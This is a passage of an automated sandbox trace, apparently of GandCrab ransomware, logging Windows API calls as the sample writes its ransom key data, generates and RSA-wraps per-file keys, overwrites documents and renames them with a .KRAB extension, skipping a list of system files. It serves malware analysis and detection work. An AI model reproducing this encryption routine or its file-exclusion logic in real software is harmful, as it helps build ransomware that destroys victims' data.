SqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0088.888] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0088.889] CloseHandle (hObject=0x434) returned 1 [0088.889] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.889] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.889] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x24, wMilliseconds=0x51)) [0088.890] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.895] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.895] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.895] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock") returned 76 [0088.895] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0088.897] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.897] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.897] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\") returned 53 [0088.897] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\*" [0088.897] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0x1023378 [0088.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.897] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0088.898] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.898] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.898] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0088.898] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0088.898] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0088.898] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock" [0088.898] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.898] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 81 [0088.898] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\d2ca4a08d2ca4dee3d.lock") returned 76 [0088.898] lstrlenW (lpString=".lock") returned 5 [0088.898] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.899] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0088.899] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.899] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.899] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0088.899] lstrcmpW (lpString1="DHbNsynUZTUlEak.ots", lpString2=".") returned 1 [0088.899] lstrcmpW (lpString1="DHbNsynUZTUlEak.ots", lpString2="..") returned 1 [0088.899] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="DHbNsynUZTUlEak.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots" [0088.899] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.900] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots.KRAB") returned 77 [0088.900] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots") returned 72 [0088.900] lstrlenW (lpString=".ots") returned 4 [0088.900] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.900] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ots ") returned 5 [0088.900] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.900] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots") returned 72 [0088.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots") returned 72 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="desktop.ini") returned 1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="autorun.inf") returned 1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="ntuser.dat") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="iconcache.db") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="bootsect.bak") returned 1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="boot.ini") returned 1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="ntuser.dat.log") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="thumbs.db") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="KRAB-DECRYPT.html") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="ntldr") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="NTDETECT.COM") returned -1 [0088.901] lstrcmpiW (lpString1="DHbNsynUZTUlEak.ots", lpString2="Bootfont.bin") returned 1 [0088.901] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.901] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0088.903] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.903] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.904] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.904] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0088.904] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.904] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.904] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010bd8) returned 1 [0088.906] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.906] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.906] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.906] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0088.906] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0088.906] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.907] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0088.908] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0088.908] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.908] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.909] GetLastError () returned 0x0 [0088.909] CryptDestroyKey (hKey=0x10230f8) returned 1 [0088.909] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.909] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010ce8) returned 1 [0088.910] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0088.910] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.911] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.911] GetLastError () returned 0x0 [0088.911] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.911] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.911] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\dhbnsynuztuleak.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0088.912] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.912] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.912] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xd64e, lpOverlapped=0x0) returned 1 [0088.926] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff29b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.926] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd64e, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xd64e, lpOverlapped=0x0) returned 1 [0088.926] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0088.927] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.931] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.931] CloseHandle (hObject=0x3a8) returned 1 [0088.931] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.932] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\dhbnsynuztuleak.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\DHbNsynUZTUlEak.ots.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\dhbnsynuztuleak.ots.krab")) returned 1 [0088.933] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.933] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0088.933] lstrcmpW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2=".") returned 1 [0088.933] lstrcmpW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="..") returned 1 [0088.933] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\", lpString2="FKT56s2wxZz0FRw6E.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx" [0088.933] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.933] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx.KRAB") returned 80 [0088.934] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx") returned 75 [0088.934] lstrlenW (lpString=".docx") returned 5 [0088.934] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.934] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0088.934] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.934] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx") returned 75 [0088.934] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx") returned 75 [0088.934] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="desktop.ini") returned 1 [0088.934] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="autorun.inf") returned 1 [0088.934] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="ntuser.dat") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="iconcache.db") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="bootsect.bak") returned 1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="boot.ini") returned 1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="ntuser.dat.log") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="thumbs.db") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="ntldr") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="NTDETECT.COM") returned -1 [0088.935] lstrcmpiW (lpString1="FKT56s2wxZz0FRw6E.docx", lpString2="Bootfont.bin") returned 1 [0088.935] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.935] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010ce8) returned 1 [0088.943] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.944] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.944] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.944] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0088.944] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.944] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.944] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010bd8) returned 1 [0088.946] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.947] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.947] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.947] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0088.947] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0088.947] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.947] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0088.949] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0088.949] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.949] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.949] GetLastError () returned 0x0 [0088.950] CryptDestroyKey (hKey=0x10230f8) returned 1 [0088.950] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.950] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010930) returned 1 [0088.951] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0088.951] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0088.951] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0088.952] GetLastError () returned 0x0 [0088.952] CryptDestroyKey (hKey=0x10230f8) returned 1 [0088.952] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0088.952] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\fkt56s2wxzz0frw6e.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0088.953] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.953] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.953] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xa08b, lpOverlapped=0x0) returned 1 [0088.966] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff5f75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.966] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa08b, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xa08b, lpOverlapped=0x0) returned 1 [0088.967] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0088.967] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.971] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.971] CloseHandle (hObject=0x3a8) returned 1 [0088.971] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.972] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\FKT56s2wxZz0FRw6E.docx" (normalized: 